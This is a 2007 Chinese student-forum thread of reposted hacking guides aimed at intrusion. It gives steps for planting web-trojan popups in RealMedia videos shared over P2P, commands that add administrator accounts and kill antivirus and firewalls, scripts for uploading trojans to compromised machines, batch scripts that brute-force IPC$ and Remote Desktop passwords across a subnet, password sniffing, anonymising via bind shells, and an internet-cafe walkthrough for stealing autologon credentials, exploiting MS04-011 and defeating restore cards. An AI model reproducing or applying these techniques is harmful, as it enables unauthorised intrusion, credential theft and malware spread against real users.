惠安学生网

 找回密码
 注册

QQ登录

只需一步,快速开始

楼主: 嬡哭鬼'

[讨论]黑客技术讨论专帖

[复制链接]
 楼主| 发表于 2007-1-2 23:01:00 | 显示全部楼层

黑客隐蔽技巧:在Real影片中放置木马

经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉!

  在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我下了一个这样的小 木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。 使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.

  新建一个文本文件rmevents.txt. 输入: u 00:01:00.0 00:01:30.0 http://yjs.bit.edu.cn/bbs 我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的 木马 地址。 输入rmevents -i 电影 .rm -e rmevents.txt -o 电影 1.rm 这个命令,生成的 电影 .rm就是我们的 木马 文件了。 http://yjs.bit.edu.cn/bbs 这个地址是你做好的网页 木马 的地址,不管是动鲨 木马 啊,还是EXE2BMP的 木马 ,还是什么CHM 木马 . 防御方法更简单,嘿嘿,不看 电影 就没事了。要不就不用Realpalyer看吧,换别的播放器。

  去除realoneplay,里的网页问题 这个弹出的网页是由一开始压制影片的人压进去的广告页。可以通过 Helix Producer Plus V9.01 的rmevents.exe编辑掉。

  方法一: 在你的安装目录C:\Program Files\Real\Helix Producer Plus\RealMediaEditor默认是这个目录,里有一个rmevents.exe 在命令提示行cmd.exe下进入这个目录,运行rmevents.exe 然后 建立一个内容为空的 events.txt 文件 rmevents -i input.rm -e events.txt -o output.rm input.rm为有广告的原来的rmvb影片。 output.rm为转换后的新影片名称。 可以自定义。 这个相当于覆盖掉原来的Event设置,对RMVB也有效。

  方法二: 直接运行C:\Program Files\Real\Helix Producer Plus\RealMediaEditor目录下的rmedtgui.exe效果跟上面的命令提示行下是一样的。 运行rmedtgui.exe后,打开有广告的rmvb影片,选择菜单里的tools ——》merge events,打开新建立的空白events.txt,再在file下选择save as保存修改好的文件。 Helix Producer Plus V9.01在自由下载提供下载 教你在RM中插入网址 制作开始 先准备个正常的RM文件 下载个Helix Producer Plus 安装。

  在准备个文本命令文件 文本命令如下 实例:在00:20.0(时分秒毫)—01:10.0时让欣赏者自动弹出 http://yjs.bit.edu.cn/bbs 主页 在03:10.0(时分秒毫)—03:59.0时让欣赏者自动弹出 http://yjs.bit.edu.cn/bbs 主页 1、编辑事件文件 新建一个记事本文件,命名为event.txt(可随意),输入以下内容: u 00:20.0 01:10.0 http://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http://yjs.bit.edu.cn/bbs 存盘后退出 解释:u 表示URL事件, 00:20.0是起启时间,01:10.0是结束时间,后面是指定的网页.
  
    下一步 进入Helix Producer Plus的安装目录下的RealMediaEditor子目录,双击运行rmedtgui.exe文件,从file菜单Open打开一个Rm文件,从菜单栏的tools(工具)中选择Merge Events(合并事件),在弹出的对话框中选择刚才编辑的event.txt文件,确定后Rmedtgui开始合并事件,合并结束后,请将含有事件文件的RM文件另行保存。整个过程应当在15分钟以内完成,还是相当快的

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:01:00 | 显示全部楼层

菜鸟经典入侵DOS命令小节

一.对用户操作

net user 查看有哪些用户

net user guest /active:yes 激活guest用户

net user 用户名 密码 /add 建立用户

net localgroup administrators 用户名 /add 把“用户”添加到管理员中

使其具有管理员权限

 


net start -----查看开启了哪些服务

net start 服务名-----开启服务

net stop 服务名------停止某服务

netstat -an  :查看端口的网络连接情况

ipconfig :查看本地ip地址

 

net stop sharedaccess  ----关系统自带防火墙

pskill.exe ravmon -----杀掉瑞星软件

pskill.exe pfw  ----关天网防火墙

net stop "Symantec AntiVirus"----关于诺顿企业版

net stop KAVStart------关闭金山杀毒

 


*****************************************************************
http://bbs.520hack.com/read.php?tid=15482&keyword=dos
更多的DOS命令
******************************************************************


向肉鸡上传文件命令:

第一种方法:tftp

命令格式:tftp -i 你的公网IP  get xx.exe

第二种方法:ftp

命令格式:

echo open xxx.xxx.xxx.xxx>c:\520hack.txt

echo user>>c:\520hack.txt

echo pass>>c:\520hack.txt 

echo get aoqi.rar>>c:\520hack.txt

echo bye>>c:\520hack.txt

ftp -s:c:\520hack.txt

del c:\520hack.txt

 

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:02:00 | 显示全部楼层

入侵时隐藏自己的真正身份

在入侵中,很多时侯会使用telent来登陆的,但是如果服务器启动telnet服务的话,登陆就会被记录下来,虽然可以有程序可以清除那些记录,但是一定是要有admin权限才可以的,如果你第一次入侵时都是通过猜密码的话,而且入侵不成功或成功后亦得不到admin权限的话,那就清不掉那些记录了。以后是简单说说几种可以隐藏自己身份的方法:

1.使用socks代理,视窗下自带的telnet程序是不支持socks代理的,想使作socks代理就要通过其它程序,例如sockcap32,e-border client等等,其它的telnet客户程序,例如netterm是直接支持socks代理的,但是你是没法知道那个代理服务器是否会主录下你的要求的,如果是一个恶意的代理的话,会从记录中得到你输入的用户名和密码的,而且有记录的话,亦不算得上是安全的。wingate亦可以当成是跳板的,不过不是很方便。

2.在肉鸡上建立跳板,这种方法是比较安全的。传统方法是在肉鸡上增加一个admin权限的帐户,然后启动telnet服务,在入侵时先telnet上这台肉鸡,再通过网鸡telnet上要入侵的服务器,完成入侵后就将肉鸡上的telnet日志清掉。

现在流行的还有其它的几种方法,一般都是在肉鸡上执行一个shell程序,这个程序被执行后就在肉鸡上打开一个端口让你telnet上去,这种方法好处是不用清日志,除非是防火墙记录下你的连接,不然是不会被发现的。这些程序常见的有nc(全名netcat),ncx99(每使用一次都是执行一次),icmd(可自定义端口和密码,推荐),Drat(这是木马,而且很难清掉,将代码插入shell进程上,不建议使用),tini(非常小的木马,只有3K,不过可被查杀,不是很安全),winshell(国产程序,不过不能在中文的NT或2000中执行,程序7K大小,不过因为不能在中文视窗中使用,我不是很喜欢),leapfrog(算是旧程序,压缩后有40多K,可以自定义端口,而且可以限制那个段的IP可以允许连接,例如你的IP是61.127.189.89的话,一般来说,前三位的IP都不会变化的,你可以设置允许连接的IP段是61.127.189.*,这样只有符合这个段的IP才可以连上,我最喜欢的还是它可以在所有的windows上执行,而上面的几种程序除了木马和nc外,winshell,icmd,ncx99都不能在win95或98上执行的,但现在使用win98的用户还是远远在使用2000或NT的用户上的),snake代理跳板(国人开发的sock服务器端程序,在肉鸡上执行,但一定要有admin的权限才可以启动的,只可以在2000或NT下执行,而且中文的视窗是不可以使用的)。

总结:使用socks代理或wingate不算是十分安全,在肉鸡上使用telnet服务亦算是安全的(你要记得清日志),不过很多服务器都不会打开telnet服务的。使用一些shell程序或木马是十分方便和安全的。在那些shell程序和木马中,winshell和snake代理跳板亦算是不错的,但很不幸就是有限制(国人开发的程序都是很有限制的),ncx99,icmd,nc是个不错的选择,nc还有很多功能的,至于那两个木马,drat就太危险了,可以会导致那台肉鸡不可以正常运行的,tini就不会在自启动中加载。leapfrog虽然比winshell或snake等大,但还是值得试试的,而且leapfrog可能饶过防火墙,因为很多防火墙只限制了某些端口可以使用的,上述的那些程序使如winshell,snake,icmd和nc都可以自定义端口,但是如果防火墙只允许80端口的话,上述程序如果将自己绑在80端口的话,因为服务器打开了80端口一般是有www服务的,如果你再将上述的程序绑入80端口的话,一定会产生错误的,但leapfrog就没有这个问题的。

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:03:00 | 显示全部楼层

黑客基础之DOS (最齐全)

net use \\ip\ipc$ " " /user:" "  建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名"  建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名"  直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$  登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del  删除IPC链接
net use h: /del  删除映射对方到本地的为H:的映射
net user 用户名 密码 /add  建立用户
net user guest /active:yes  激活guest用户
net user  查看有哪些用户
net user 帐户名  查看帐户的属性
net localgroup administrators 用户名 /add  把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start  查看开启了哪些服务
net start 服务名   开启服务;(如:net start telnet, net start schedule) 
net stop 服务名  停止某服务
net time \\目标ip  查看对方时间
net time \\目标ip /set  设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view  查看本地局域网内开启了哪些共享
net view \\ip  查看对方局域网内开启了哪些共享
net config  显示系统网络设置
net logoff  断开连接的共享
net pause 服务名  暂停某服务
net send ip "文本信息"  向对方发信息
net ver  局域网内正在使用的网络连接类型和信息
net share  查看本地开启的共享
net share ipc$  开启ipc$共享
net share ipc$ /del  删除ipc$共享
net share c$ /del  删除C:共享
net user guest 12345  用guest用户登陆后用将密码改为12345
net password 密码  更改系统登陆密码
netstat -a  查看开启了哪些端口,常用netstat -an
netstat -n  查看端口的网络连接情况,常用netstat -an
netstat -v  查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip  查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s  查看正在使用的所有协议使用情况
nbtstat -A ip  对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名)  跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名)  向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip  死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg)  用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t  以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名  加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名  加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录 或用:rmdir /s /Q 目录  /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名  移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt  对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号  开启已注册的某个计划任务
at /delete  停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete  停止某个已注册的计划任务
at  查看所有的计划任务
at \\ip time 程序名(或一个命令) /r  在某时间运行对方某程序并重新启动计算机
finger username @host  查看最近有哪些用户登陆
telnet ip 端口  远和登陆服务器,默认端口为23
open ip  连接到IP(属telnet登陆后的命令)
telnet  在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y  复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:03:00 | 显示全部楼层
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名  导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名  查看文件的访问用户权限列表
REM 文本内容  在批处理文件中添加注解
netsh  查看或更改本地网络配置情况
IIS服务命令:
iisreset /reboot  重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop  启动(停止)所有Internet服务
iisreset /restart  停止然后重新启动所有Internet服务
iisreset /status  显示所有Internet服务状态
iisreset /enable或disable  在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror  当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce  若无法停止Internet服务,将不会强制终止Internet服务 
iisreset /timeout  Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。 
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files]  从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file]  列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件 
mkdir directory-name 在远端主机中建立目录 
rename [from] [to] 改变远端主机中的文件名 
rmdir directory-name 删除远端主机中的目录 
status 显示当前FTP的状态 
system 显示远端主机系统类型 
user user-name [password] [account] 重新以别的用户名登录远端主机 
open host [port] 重新建立一个新的连接 
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases;  显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 
use mysql;
show tables;  显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名;  建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和
回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:04:00 | 显示全部楼层

1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters]  %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关

IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:\pass.txt)时}。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。 


2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。 
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”


(二)系统外部命令(均需下载相关工具):

1、瑞士军刀:nc.exe

参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行[危险]
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C 
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
    基本用法:
nc -nvv 192.168.0.1 80  连接到192.168.0.1主机的80端口
nc -l -p 80  开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024  扫锚192

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:04:00 | 显示全部楼层

基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]  扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项]  扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active  检测主机是否存活
-os  检测远程操作系统类型(通过NETBIOS和SNMP协议) 
-port  检测常用服务的端口状态 
-ftp 检测FTP弱口令 
-pub  检测FTP服务匿名用户写权限 
-pop3 检测POP3-Server弱口令 
-smtp 检测SMTP-Server漏洞 
-sql  检测SQL-Server弱口令 
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi  检测CGI漏洞
-nasl  加载Nessus攻击脚本 
-all  检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机 
-o  跳过没有检测到开放端口的主机 
  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o  检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报 
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名 
-addr IP地址 过滤IP地址
-port 端口 过滤端口 
-log 文件名 将输出保存到文件 
-asc 以ASCII形式输出
-hex 以16进制形式输出 
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 


4、终端服务密码破解: tscrack.exe

参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用-f后面的密码
-F 间隔时间(频率)
-l 使用-l后面的用户名
-w 使用-w后面的密码字典
-p 使用-p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic  远程用密码字典文件暴破主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456  用密码123456远程登陆192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。


5、其它:

Shutdown.exe
Shutdown \\IP地址 t:20  20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)
fpipe.exe (TCP端口重

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:04:00 | 显示全部楼层

:计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:05:00 | 显示全部楼层

攻无不克决战网吧入侵

一. 网吧入侵 

  入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆! 

  这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。 

  为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。 

  知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。如图1。 

  开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。如图2。再在telnet下面直接运行3721.exe就ok了。 

  另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。 

  还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。 

  二.网吧木马 

  在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了 

  一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET 

  描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码, 

  当你AH=2的时,它便会call原始INT 13地址来完成(商周)作. 

  只要找到原始INT 13入口便可以为所欲为. 

  具体过程如下: 

  开机过程按住F8键,进入纯dos环境, 注";"后为注释. 

  出现提示符c:, 

  键入c:\debug, 

  - a100 

  - xor ax,ax 

  - int 13 

  - int3 

  ; 寻找原始的int 13入口. 

  然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx 

  ,后面的指令为:mov dl,80 (练练眼力-。按q退出. 
 记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。 

  例如俺的得到的地址是F000:9A95 

  再次运行debug ,键

回复 支持 反对

使用道具 举报

 楼主| 发表于 2007-1-2 23:06:00 | 显示全部楼层

如何辨别电脑是否中毒

